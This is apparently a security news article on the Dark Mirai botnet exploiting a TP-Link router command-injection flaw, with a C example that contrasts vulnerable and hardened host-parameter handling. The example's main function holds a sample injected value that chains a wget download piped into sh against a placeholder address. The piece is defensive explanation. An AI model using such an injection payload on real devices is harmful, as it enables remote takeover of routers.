Last Updated on 10/12/2021 by Nidhi Khandelwal
Dark Mirai (also known as MANGA) has been seen exploiting a new vulnerability in the TP-Link TL-WR840N EU V5, a popular low-cost home router released in 2017.
The flaw is tracked as CVE-2021-41653 and stems from an unsanitized ‘host’ parameter that lets an authenticated user inject and run arbitrary commands on the device.
Threat actors began exploiting the vulnerability after the researcher who found it published a proof-of-concept (PoC) exploit for the RCE.
According to Fortinet researchers tracking Dark Mirai activity, the botnet added the RCE to its arsenal just two weeks after TP-Link released the firmware update that fixes it.
Process of exploitation
The actors behind Dark Mirai use CVE-2021-41653 to make the router download and execute a malicious shell script named “tshit.sh,” which in turn fetches the main binary payloads over two further requests.
The attacker must still authenticate to the router’s web interface for the attack to succeed, but if the owner has left the device on default credentials, exploitation becomes straightforward.
MANGA, like the original Mirai, detects the architecture of the infected device and retrieves the matching payload.
Then, to keep other botnets from taking over the compromised device, it blocks connections on the ports that rival botnets commonly target.
Finally, the malware waits for a command from the C&C (command and control) server to launch a distributed denial-of-service (DDoS) attack.
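The bug class behind CVE-2021-41653, as the article describes it, is an OS command injection: a diagnostic feature hands the user-supplied host value to a shell without validating it, so a payload such as the one that fetches “tshit.sh” rides along after the intended target address. The C snippet below is an added illustration, not TP-Link’s firmware code or the botnet’s exploit; the exact command shape, the helper names and the sample payload (including the 198.51.100.x documentation addresses and the URL) are assumptions constructed for the example. It contrasts the vulnerable pattern with a hardened one that validates the host as a hostname or dotted IPv4 address and passes it as a single argv entry so no shell ever parses it.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Vulnerable pattern (assumed shape of the bug class, not the real firmware):
 * the user-controlled host string is spliced into a shell command line that
 * would then be handed to system() or popen(). This function only builds the
 * string so the effect can be inspected; it never executes anything.
 * Returns 0 on success, -1 if the buffer is too small. */
int build_ping_cmd_vulnerable(const char *host, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "ping -c 1 %s", host);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Hardened check: accept only an RFC 1123-style hostname or dotted IPv4
 * (letters, digits, '.', '-') with sane length limits. Every shell
 * metacharacter (';', '|', '&', '`', '$', quotes, whitespace, ...) is
 * rejected, and a leading '-' is refused so the value cannot be parsed as
 * a ping option either. Returns 1 if valid, 0 otherwise. */
int host_is_valid(const char *host)
{
    size_t len, label_len = 0;

    if (host == NULL) return 0;
    len = strlen(host);
    if (len == 0 || len > 253) return 0;
    if (host[0] == '.' || host[0] == '-' || host[len - 1] == '-') return 0;

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (c == '.') {
            if (label_len == 0) return 0;          /* empty label, e.g. "a..b" */
            if (host[i - 1] == '-') return 0;      /* label may not end in '-'  */
            label_len = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-')) return 0;   /* shell metacharacters etc. */
        if (c == '-' && label_len == 0) return 0;  /* label may not start with '-' */
        if (++label_len > 63) return 0;
    }
    return 1;
}

/* Hardened builder: validate first, then fill an argv vector for
 * execv()/posix_spawn() so the host value is always one literal argument.
 * Returns the number of argv entries on success, -1 if the host is rejected. */
int build_ping_argv(const char *host, const char *argv[], size_t max_args)
{
    if (max_args < 5 || !host_is_valid(host)) return -1;
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "1";
    argv[3] = host;
    argv[4] = NULL;
    return 4;
}

int main(void)
{
    /* Constructed payload in the style the article describes: a benign
     * target followed by a download-and-execute chain. Addresses and URL
     * are placeholders from the documentation range, not real infrastructure. */
    const char *payload = "198.51.100.1;wget http://198.51.100.7/tshit.sh -O- | sh";
    char cmd[256];
    const char *argv[5];

    if (build_ping_cmd_vulnerable(payload, cmd, sizeof cmd) == 0)
        printf("vulnerable build would run: %s\n", cmd);

    printf("hardened build accepts payload: %s\n",
           build_ping_argv(payload, argv, 5) == -1 ? "no" : "yes");
    printf("hardened build accepts 192.168.0.1: %s\n",
           build_ping_argv("192.168.0.1", argv, 5) == 4 ? "yes" : "no");
    return 0;
}
```

The validator deliberately rejects rather than escapes: quoting a value for a shell is fragile across shells and BusyBox builds, whereas an allow-list plus execv() removes the shell from the path entirely. On a device with default credentials this check is the only thing standing between an authenticated web session and a root shell, which is exactly the window Dark Mirai exploits.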
Mirai itself may no longer be active, but its code has spawned a slew of new botnets that continue to wreak havoc on unprotected devices.
We just reported on the appearance of ‘Moobot,’ which spreads through a command injection flaw in Hikvision equipment.